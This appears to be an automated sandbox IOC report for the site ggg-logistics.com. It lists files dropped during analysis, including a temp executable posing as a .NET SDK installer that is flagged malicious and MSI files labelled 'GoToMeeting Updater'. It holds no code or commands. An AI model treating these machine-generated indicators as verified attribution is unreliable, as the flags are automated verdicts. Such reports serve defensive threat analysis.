IOC Report
https://ggg-logistics.com/

loading gif

Files

File Path
Type
Category
Malicious
C:\Users\user\AppData\Local\Temp\dotnet-sdk-8.0.408-win-x64.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Config.Msi\58adc9.rbs
data
dropped
C:\Config.Msi\58adcc.rbs
data
dropped
C:\Config.Msi\58adce.rbs
data
dropped
C:\Config.Msi\58add0.rbs
data
dropped
C:\Config.Msi\58add2.rbs
data
dropped
C:\Config.Msi\58add4.rbs
data
dropped
C:\Config.Msi\58add6.rbs
data
dropped
C:\Config.Msi\58add8.rbs
data
dropped
C:\Config.Msi\58adda.rbs
data
dropped
C:\Config.Msi\58addc.rbs
data
dropped
C:\Config.Msi\58adde.rbs
data
dropped
C:\Config.Msi\58ade0.rbs
data
dropped
C:\Config.Msi\58ade2.rbs
data
dropped
C:\Config.Msi\58ade4.rbs
data
dropped
C:\Config.Msi\58ade6.rbs
data
dropped
C:\Config.Msi\58ade8.rbs
data
dropped
C:\Config.Msi\58adea.rbs
data
dropped
C:\Config.Msi\58adec.rbs
data
dropped
C:\Config.Msi\58adee.rbs
data
dropped
C:\Config.Msi\58adf0.rbs
data
dropped
C:\Config.Msi\58adf2.rbs
data
dropped
C:\Config.Msi\58adf4.rbs
data
dropped
C:\Config.Msi\58adf6.rbs
data
dropped
C:\Config.Msi\58adf8.rbs
data
dropped
C:\Config.Msi\58adfa.rbs
data
dropped
C:\Config.Msi\58adfc.rbs
data
dropped
C:\Config.Msi\58adfe.rbs
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bl25zx5c.ps3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0bqkozc.5rf.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Installer\58adca.msi
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI15A3.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI1640.tmp
data
dropped
C:\Windows\Installer\MSI19BC.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI1C2E.tmp
data
dropped
C:\Windows\Installer\MSI21FB.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI22B7.tmp
data
dropped
C:\Windows\Installer\MSI2623.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI26F0.tmp
data
dropped
C:\Windows\Installer\MSI2ED0.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI2F6D.tmp
data
dropped
C:\Windows\Installer\MSI32BA.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI3357.tmp
data
dropped
C:\Windows\Installer\MSI3656.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI3722.tmp
data
dropped
C:\Windows\Installer\MSI379E.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI3A7F.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
modified
C:\Windows\Installer\MSI447.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI4E4.tmp
data
dropped
C:\Windows\Installer\MSI5D.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI8FC.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSI9E8.tmp
data
dropped
C:\Windows\Installer\MSIADD8.tmp
data
dropped
C:\Windows\Installer\MSIB4DE.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIB5CA.tmp
data
dropped
C:\Windows\Installer\MSIB955.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIBA02.tmp
data
dropped
C:\Windows\Installer\MSIBD00.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIBE78.tmp
data
dropped
C:\Windows\Installer\MSIC213.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIC34D.tmp
data
dropped
C:\Windows\Installer\MSIC7B3.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIC9B7.tmp
data
dropped
C:\Windows\Installer\MSICEBA.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSICF76.tmp
data
dropped
C:\Windows\Installer\MSID2E2.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSID3DD.tmp
data
dropped
C:\Windows\Installer\MSID71A.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSID873.tmp
data
dropped
C:\Windows\Installer\MSIDC9B.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIDDF3.tmp
data
dropped
C:\Windows\Installer\MSIE19E.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIE22B.tmp
data
dropped
C:\Windows\Installer\MSIE597.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIE625.tmp
data
dropped
C:\Windows\Installer\MSIEB.tmp
data
dropped
C:\Windows\Installer\MSIEB75.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIECBF.tmp
data
dropped
C:\Windows\Installer\MSIF03A.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIF26E.tmp
data
dropped
C:\Windows\Installer\MSIF28.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIF58C.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIF60A.tmp
data
dropped
C:\Windows\Installer\MSIF956.tmp
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: GoToMeeting Updater, Author: CitrixSystems, Keywords: Installer, Comments: This installer database contains the logic and data required to install GoTo., Template: x64;1033, Revision Number: {8EB6C5B9-E3E4-4C99-901D-D3213245204A}, Create Time/Date: Fri May 30 13:03:54 2025, Last Saved Time/Date: Fri May 30 13:03:54 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
dropped
C:\Windows\Installer\MSIFBC8.tmp
data
dropped
C:\Windows\Installer\MSIFD5.tmp
data
dropped
C:\Windows\Installer\inprogressinstallinfo.ipi
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Windows\Temp\~DF02741DF85CE430D1.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF0342E85147403DCF.TMP
data
dropped
C:\Windows\Temp\~DF034F8074031FB9CC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF0361120F071C7702.TMP
data
dropped
C:\Windows\Temp\~DF037C8E719F0A6327.TMP
data
dropped
C:\Windows\Temp\~DF041D4752AEFFFD56.TMP
data
dropped
C:\Windows\Temp\~DF041D6F3E606CBA31.TMP
data
dropped
C:\Windows\Temp\~DF04B2D613EF6757F9.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF05B683217D2F47D8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF06B2EC84FB19EF43.TMP
data
dropped
C:\Windows\Temp\~DF070A267CA2B1F287.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF0767AB63F419569C.TMP
data
dropped
C:\Windows\Temp\~DF08D5D6D8AB8CF9CC.TMP
data
dropped
C:\Windows\Temp\~DF08EAC476179B0D4E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF0A31816597FE2CAA.TMP
data
dropped
C:\Windows\Temp\~DF0C9E143A6E0CFB0A.TMP
data
dropped
C:\Windows\Temp\~DF0E2E3E7A31CF597A.TMP
data
dropped
C:\Windows\Temp\~DF0FF372688B8F8D2C.TMP
data
dropped
C:\Windows\Temp\~DF1081AF0A25675463.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF11ECB0A1693372FD.TMP
data
dropped
C:\Windows\Temp\~DF162031814644C25C.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF16E47A6F02462C6C.TMP
data
dropped
C:\Windows\Temp\~DF1740B24EEE5DE4D0.TMP
data
dropped
C:\Windows\Temp\~DF187DD88DF0F443BD.TMP
data
dropped
C:\Windows\Temp\~DF18CACB51F9842E0F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF18F0874382DD4BF8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF195C2885D470EFB1.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF19943193402F303A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF1BD290B3824C4F3D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF1C9A3D2F9DCE0B9A.TMP
data
dropped
C:\Windows\Temp\~DF1D24EE58BC56FB38.TMP
data
dropped
C:\Windows\Temp\~DF1D507864788381F4.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF1D9183E82CF6E984.TMP
data
dropped
C:\Windows\Temp\~DF1E8C3EE698F22DBA.TMP
data
dropped
C:\Windows\Temp\~DF1F3FFECC6C301795.TMP
data
dropped
C:\Windows\Temp\~DF1F6ECC5491F1E746.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF200170720A104E5B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF24DC11C0525A87CF.TMP
data
dropped
C:\Windows\Temp\~DF26802C5A26D62047.TMP
data
dropped
C:\Windows\Temp\~DF268BED1551C0C809.TMP
data
dropped
C:\Windows\Temp\~DF26FD2921192ADE53.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF272A8CA6F892C141.TMP
data
dropped
C:\Windows\Temp\~DF2834166373293C9E.TMP
data
dropped
C:\Windows\Temp\~DF2A234CE4E089A748.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2B2768FA5B7CF87B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2BA6FFA6E5803697.TMP
data
dropped
C:\Windows\Temp\~DF2C2DCFC5395B9BAE.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2C43A1F75103C8DD.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2D330A5006AE4860.TMP
data
dropped
C:\Windows\Temp\~DF2D6526DB21AC695A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2E5787F6BE794293.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF2EBAFA7FA8EC922E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF32BBFD7446BBE7E3.TMP
data
dropped
C:\Windows\Temp\~DF32E618ED0EDD96D4.TMP
data
dropped
C:\Windows\Temp\~DF32F9E059CE7BD934.TMP
data
dropped
C:\Windows\Temp\~DF33959AECFFFA5F8D.TMP
data
dropped
C:\Windows\Temp\~DF33F16A36E5D89BE5.TMP
data
dropped
C:\Windows\Temp\~DF33F7ADEC987DCAFC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF34502751FA634A3F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF34E9B878109D2BBD.TMP
data
dropped
C:\Windows\Temp\~DF351ACE8053F70655.TMP
data
dropped
C:\Windows\Temp\~DF3537F436BDDF2E60.TMP
data
dropped
C:\Windows\Temp\~DF362E0DEF9CBD078D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF36965DCA12B649E8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF36A99BB884E5AA4E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF36C0789A07D5026F.TMP
data
dropped
C:\Windows\Temp\~DF36C171F4B5FB7845.TMP
data
dropped
C:\Windows\Temp\~DF36E0A9740B95F365.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF371B2184DC893297.TMP
data
dropped
C:\Windows\Temp\~DF37897F338F74A5C5.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF384914AA36282E99.TMP
data
dropped
C:\Windows\Temp\~DF38741AA263F16903.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF38B7D5A26C90BE72.TMP
data
dropped
C:\Windows\Temp\~DF39FA8343A74B6D97.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3A715EE4F13BB330.TMP
data
dropped
C:\Windows\Temp\~DF3C4BDE1E49F7E692.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3C58B7E8A9B45F09.TMP
data
dropped
C:\Windows\Temp\~DF3C8C692E5136E116.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3D1D94328933181E.TMP
data
dropped
C:\Windows\Temp\~DF3D65D0534554A7A0.TMP
data
dropped
C:\Windows\Temp\~DF3DBA52EFC644F000.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3DE7184DDF95FC3E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF3F14AFA026151C32.TMP
data
dropped
C:\Windows\Temp\~DF3F27C03D6B80B591.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF41D6BB8B33DE0FF3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF41F2F5ABB62B08E2.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF4365C2D01248FDA3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF4463558825D5E73F.TMP
data
dropped
C:\Windows\Temp\~DF455E9074E24D1E00.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF456D62169AD585D5.TMP
data
dropped
C:\Windows\Temp\~DF462B33AA389C793D.TMP
data
dropped
C:\Windows\Temp\~DF465624BB38D11573.TMP
data
dropped
C:\Windows\Temp\~DF4696BCF7053A9F50.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF473BC77276459E62.TMP
data
dropped
C:\Windows\Temp\~DF4747B2BD663DE760.TMP
data
dropped
C:\Windows\Temp\~DF4760BFB684AC9D29.TMP
data
dropped
C:\Windows\Temp\~DF47ADEC9323C8AE4B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF47E3EC67A7946FBC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF485DE7A33190C86D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF48C605FA7312D6E0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF4D129EFFDCA18423.TMP
data
dropped
C:\Windows\Temp\~DF4D69041888ACABF2.TMP
data
dropped
C:\Windows\Temp\~DF4D9D424DCFCD3074.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF4FD761B139B07E24.TMP
data
dropped
C:\Windows\Temp\~DF502E265E354EE93B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF5100A453738C1B0C.TMP
Composite Document File V2 Document, Cannot read section info
dropped
